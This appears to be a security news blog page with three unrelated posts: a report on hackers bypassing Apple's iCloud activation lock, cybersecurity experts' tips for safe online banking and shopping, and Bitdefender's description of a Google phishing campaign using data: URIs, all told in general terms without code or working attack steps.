Apple iCloud stormed by Dutch Hackers

Apple cloud service "iCloud" is probably one of the secure cloud service owned by the Apple Inc. It the same cloud storage and cloud computing service provided by the Apple Inc. to its users since October 2011 with more than 320 million users across the world. 

Couple of the hackers go by the name AquaXetine and Moroccan hacker with the name Merruktechnolog, have claimed to hack the Apple iCloud system. Hackers have used the Man-in-Middle attack for the hack of the Apple locked devices. 

According to a report from Dutch news organization De Telegraaf, the hackers purchased locked iPhone devices for $50 to $150 each and then bypassed Apple’s iCloud activation lock through a serious security vulnerability Apple has failed to patch with its most recent updates. iCloud service allows users to store and back-up data such as music, photos, applications, documents, bookmarks, reminders, backups, notes, iBooks, and contacts, and provides a platform for Apple's email servers and calendars. 

Security experts says that hackers can do more thing with the vulnerability. Attacker can read the message and also steal the Apple ID credentials from the devices. Hackers have worked for five months to breach the security of Apple iCloud system. Last day Doulci hacker group on their twitter have posted that the group have “processed” more than 5,700 Apple devices in just five minutes using the hack. With the good intention and with ethical subject, hackers have reported the vulnerability to Apple Security team back in March, but Apple team have never responded to their vulnerability report. 

This makes the hackers to disclose the vulnerability publicly. The pair of hackers are offering unlocking services via doulCi.nl website, according to information found on their website. With this doulCi is the world’s first Alternative iCloud Server, and the world’s first iCloud Activation Bypass.

Tips from cyber experts to tread safely

They know the risks of the internet better than anyone, but most cyber experts still shop and bank online with care.

"We operate in the 21st century ... I've got to shop online, I've got to pay my bills online," Brigadier General Paul Nakasone, deputy commander of US Army Cyber Command, said at the Reuters Cybersecurity Summit.

"You can't really function without it," agreed Nart Villeneuve, researcher at the cybersecurity firm FireEye.

Some actions can leave you wide open for data abuse, like checking into a hotel and handing over a credit card, he said. "I guess you could pull up with a money clip but I don't know that you can even do that," he said.

The tricks that the smartest cybersecurity minds use for online safety hygiene are basic: Avoid websites that are visibly questionable, don't thoughtlessly click on links or attachments, monitor your account activity regularly and only give away the minimum amount of information.

On passwords, the bulwark of online security, experts also stuck to simple rules: Make them complex and change regularly. Some also said they use more secure login processes when available.

"I tend to be a bit of a two-factor authentication freak," said Eddie Schwartz, cyber chief at Verizon, saying he always takes advantage of any extra security steps offered, like

confirming his login with a code sent to his cellphone.

Another key to safe online shopping and banking is using internet connections that are as secure as possible.

"I never do it on the road. I never do it from my mobile device," said Michael Hayden, former director of the CIA and the National Security Agency.

While most experts avoid using public wireless internet connections, some go further.

"I have a separate computer and router for financial transactions," said Dan Kaufman, director of information innovation at the Defense Advanced Research Projects Agency (DARPA), the arm of the US Defense Department credited with inventing the internet.

Kaufman said he searches for potential online purchases on one computer, them moves to a second computer to make the transaction.

Digital Bond CEO Dale Peterson had a similar strategy: a separate computer, "with its own 20-plus character password," for online banking and payroll purposes.

In a breach revealed in December by US retailer Target Corp, some 40 million credit or debit card records and 70 million other customer records, such as addresses and telephone numbers, were stolen. The perpetrators remain at large.

Several cyber experts said they felt less concerned about the potential to lose credit card data, because of limited liability, but draw the line at online banking and modern conveniences like depositing checks by smartphone.

"I'm paranoid about online banking," said Stuart McClure, CEO of security firm Cylance. "I'm a little bit more comfortable now but I hate to do online banking. I hate it.

"I used to change my passwords so much that I'd forget them over time. And I never ever put my PIN into anything electronic, only physical devices. And even then, I'm pulling up, looking for skimmers," he said, referring to devices made to secretly swipe card information from ATM machines.

Is total avoidance a solution?

"I am not one who says that the answer is to withdraw from the digital world that we live in. I just don't think that's particularly realistic," said Admiral Mike Rodgers, the new director of the NSA. "Let's deal with the world the way it is."

A New Phishing method to steal Google account details

Security experts at Bitdefender discovered a new ingenious phishing scheme that is being used by hackers to steal Google Account credentials.

Security experts at Bitdefender have discovered a news phishing scheme adopted by hackers to steal Google Account passwords.

The new phishing attack is hard to catch with traditional heuristic detection, it mainly affects Google Chrome and Mozilla Firefox internet browsers.

The hackers send an email that pretends to be from Google, it warns victim that his account will be locked in the next 24 hours because the associated InBox has reached the maximum capability.

“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,”“The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.” reports Catalin Cosoi, chief security strategist at Bitdefender in the official blog post.

To avoid that the Google account will be “locked in 24 hours” the user is invited to go to the “INSTANT INCREASE” link, but the link redirects victims to a bogus Google web log-page. Using this artifice, hackers can steal Google account credentials within the browser.

Cosoi explained that it is very difficult for users to note the attack because the fake Google web log-page goes undetected by Google’s Chrome uniform resource identifiers (URIs). The attackers exploit the way Google Chrome displays “data:” URIs.

Users will display “data:” in the address bar of their browser, which indicates the use of a data Uniform Resource Identifier scheme, the URI scheme allows attackers to include data in-line in web pages as if they were external resources.

“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.

Bitdefender says that the scammers are able to avoid detection, by using a data URI scheme, which includes data in-line web pages as if they are external sources. The content from the fake webpage is encoded in the string with the data URI scheme, the attackers used Base64 coding to represent the file contents.

According Bitdefender the more than a thousand users were deceived by the phishing scheme.

“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.

Phishing is becoming one of the most popular fraudulent activities in the cyber criminal ecosystem, hackers are exploiting new platforms like mobile and social media according the report of principal security firms.

Cyber criminals are trying to make phishing attacks harder to detect optimizing their email targeting, attackers are demonstrating to be able to find new methods of bypassing checks implemented by email providers and security firms.

Usually a targeted attack exploits the “human factor“, phishing offensives rely on social engineering techniques that is why is important to inform users of the tactics adopted by cyber criminals.

Organisations must train their personnel to reduce their human attack surface and avoid to be victims of such attacks.
So, Be careful while using Google accounts.